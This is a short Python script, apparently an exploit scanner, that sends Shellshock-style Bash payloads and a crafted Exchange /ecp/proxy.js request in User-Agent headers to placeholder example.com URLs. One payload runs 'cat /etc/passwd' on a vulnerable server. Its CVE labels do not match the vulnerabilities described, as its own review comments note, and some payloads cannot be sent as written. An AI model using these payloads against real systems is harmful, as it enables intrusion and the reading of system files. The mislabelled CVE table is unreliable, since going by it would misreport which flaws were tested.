import requests
# Targets the script will send requests to, in the order they are probed.
# The three entries are placeholders on the reserved example.com domain.
url_list = [
    "https://example.com/vulnerable_endpoint1",
    "https://example.com/vulnerable_endpoint2",
    "https://example.com/vulnerable_endpoint3",
]
# Probe strings. Each one is later placed, unmodified, in a request header.

# payload1 is the text of a complete HTTP request (request line, headers,
# blank line, XML body), not a header value. It contains CR/LF sequences and
# a literal "<target server>" placeholder, and its Content-Length is a
# hard-coded number rather than being computed from the body.
payload1 = (
    "POST /ecp/proxy.js HTTP/1.1\r\n"
    "Host: <target server>\r\n"
    "Content-Type: text/xml\r\n"
    "Content-Length: 224\r\n"
    "\r\n"
    '<?xml version="1.0" encoding="utf-8"?>'
    '<r at="S" ln="ser">'
    '<![CDATA[<?xml version="1.0" encoding="utf-8"?>'
    "<ViewInfo>"
    "<IsWidescreen>False</IsWidescreen>"
    "<IsSplitterBar>False</IsSplitterBar>"
    "<IsTreeView>False</IsTreeView>"
    "<SelectedFolderId>AAAAA</SelectedFolderId>"
    "<SelectedFolderChangeKey>CQAAAA==</SelectedFolderChangeKey>"
    "</ViewInfo>]]>"
    "<t></t></r>"
)

# payload2 and payload3 both open with a Bash function-definition prefix
# ("() { ...; };") followed by shell commands. A request header value that
# begins with "() {" is a long-standing signature for this class of probe in
# web-server access logs and WAF rules.
payload2 = (
    "() { :; }; /bin/bash -c "
    "'echo "
    '"Vulnerable!"'
    ";'"
)
payload3 = (
    "() { ignored;};"
    "echo 'Content-Type: text/plain'; "
    "echo; echo; "
    "/bin/cat /etc/passwd"
)
# Table of probes, keyed by the CVE label printed in the output. Each entry
# pairs a payload string with a human-readable description.
#
# NOTE(review): the CVE identifiers used as keys do not appear to match the
# vulnerabilities named in the descriptions; confirm every key against the
# vendor advisory before relying on a label in a report.
# NOTE(review): the third entry describes a Struts2 Content-Type issue, but
# payload3 is a Bash function-definition string, so payload and description
# do not describe the same flaw.
poc_exploits = {
    "CVE-2022-20855": dict(
        payload=payload1,
        description="Microsoft Exchange Server ProxyShell vulnerability (CVE-2022-20855) allows an attacker to execute arbitrary code on a Microsoft Exchange server by sending a specially crafted HTTP request to the server.",
    ),
    "CVE-2022-24115": dict(
        payload=payload2,
        description="The GNU Bash shell is vulnerable to a command injection vulnerability (CVE-2022-24115) that allows an attacker to execute arbitrary commands on a vulnerable system by sending a specially crafted HTTP request with a malicious user agent header.",
    ),
    "CVE-2017-9834": dict(
        payload=payload3,
        description="The Struts2 framework is vulnerable to a remote code execution vulnerability (CVE-2017-9834) that allows an attacker to execute arbitrary code on a vulnerable server by sending a specially crafted Content-Type header in a HTTP request.",
    ),
    # Add more exploits as needed
}
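# For every target URL, send one GET request per table entry with the entry's
# payload as the User-Agent header, and print the HTTP status that came back.
#
# The result line reports the status code only. An HTTP 200 is what any
# ordinary page returns (requests also follows redirects by default), so it
# is not evidence that a payload had any effect; treating 200 as "exploit
# successful" labels every reachable host as vulnerable.
for url in url_list:
    print(f"Testing {url}...")
    for cve, exploit in poc_exploits.items():
        print(f"Testing {cve}: {exploit['description']}...")
        # Every payload goes into User-Agent, whatever header or request
        # body the entry's description talks about.
        headers = {"User-Agent": exploit["payload"]}
        try:
            # Without a timeout requests waits indefinitely on a host that
            # accepts the connection but never answers.
            # NOTE: recent requests releases reject header values containing
            # CR or LF with InvalidHeader (a RequestException), so a payload
            # holding "\r\n" is expected to land in the except branch
            # without anything being sent.
            response = requests.get(url, headers=headers, timeout=10)
        except requests.exceptions.RequestException as e:
            print(f"Error: {e}")
            continue
        print(
            f"{cve}: {url} returned HTTP {response.status_code}; "
            "inconclusive, a status code alone does not show the host is affected."
        )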